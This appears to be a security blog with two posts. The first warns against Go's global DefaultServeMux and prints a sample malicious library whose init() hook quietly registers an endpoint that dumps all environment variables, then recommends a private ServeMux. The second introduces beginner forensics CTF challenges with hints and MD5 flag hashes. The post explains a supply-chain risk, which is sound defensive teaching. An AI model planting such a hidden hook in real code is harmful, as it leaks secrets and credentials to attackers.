Avoid using golang http.DefaultServerMux for production servers

I saw many guides and post showing a handy and simple way to create a webserver in go like this:

package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request){
        fmt.Fprintf(w, "pong")
    })


    fmt.Printf("Starting server at port 8080\n")
    if err := http.ListenAndServe(":8080", nil); err != nil {
        log.Fatal(err)
    }
}

Internally http.HandleFunc and http.Handle register the handler/handler function in the DefaultServerMux. The problem is that DefaultServerMux is a global and exported var.

An attacker might develop a malicious lib or hijack an existing one and attach a handler to the DefaultHandlerMux, for example in the init.

package evillogger

func init(){
	someBoringSetUp()
}

func someBoringSetUp(){
		http.HandleFunc("/xd", commonAndBoringFunctionname)
}

func commonAndBoringFunctionname(w http.ResponseWriter, r *http.Request){
	type osenv struct {
		Key string
		Value string
	}
	envs := []osenv{}
	for _, element := range os.Environ() {
		variable := strings.Split(element, "=")
		envs = append(envs, osenv{Key: variable[0], Value: variable[1]})
	}
	_ = json.NewEncoder(w).Encode(map[string]interface{}{"inyected: ": &envs})
}

Its not hard to hide or obfuscate code in large projects or codebases but the way to mitigate this problem is quite simple, just create a new server mux:

serverMux := http.NewServeMux()

In my opinion the biggest and most important lesson is not to add untrusted third-party libraries without a minimum verification.

Forensic CTF for new college students

Introduction

Some time ago I was entrusted with the task of designing some exercises to be part of a CTF. Which aim was to introduce information security concepts to university first years students without previous experience in that field. I found this task quite difficult as striking a balance in the difficulty of the exercises turned out not to be as easy as I thought. I decided to focus on the forensics area because it was direct for me to draw a parallel with what a police detective would have to do and at the same time allow students to learn about protocols like TCP HTTP, tools like wireshark, scapy, hexdump etc. I hope you enjoy them as much as I do creating them, good luck.

Challenge 1: Mobs chat

The International Comitee of Investigations is trying to catch a well known argentinian mobster named Mario. Last week one of Mario’s minion was captured along with a list of future victims. However, the list is encrypted and only with the password (the flag) will be able to decrypted. Acording to Mario’s psychological profile, he usually uses the same password pattern; a master password plus the name of any of his pets. We paid a group of hackers who provide us with a traffic capture of Mario’s computer. Will you be able to find the flag?

Mario network traffic pcap

Hint: Mario frequents unsafe chat sites.
MD5 Flag: df5738a7e288813c2c0e84de74749f9e

Challenge 2: Urgent data leak

It is suspected that the security of a computer has been compromised and the attackers are subtracting information in some way towards their server, therefore we proceed to capture network traffic from this computer and try to analyze what is happening. The objective is to find the flag that the attackers are stealing.

Network traffic pcap

Hint: There are some task that you have to do urgently.
MD5 Flag: 03a0788654dbf801bb3d84bb252cd67c

Challenge 3: PDF rfc

The famous conclave of people who designed the pdf format on a leisurely afternoon decided to write a small rfc briefly describing the format itself. Bored with this task and knowing in detail how it works they decided to hide a little message somewhere in the file. Can you find it?

Rfc37778 pdf

MD5 Flag: 522bbad8370d66c1ed001c5a104593f8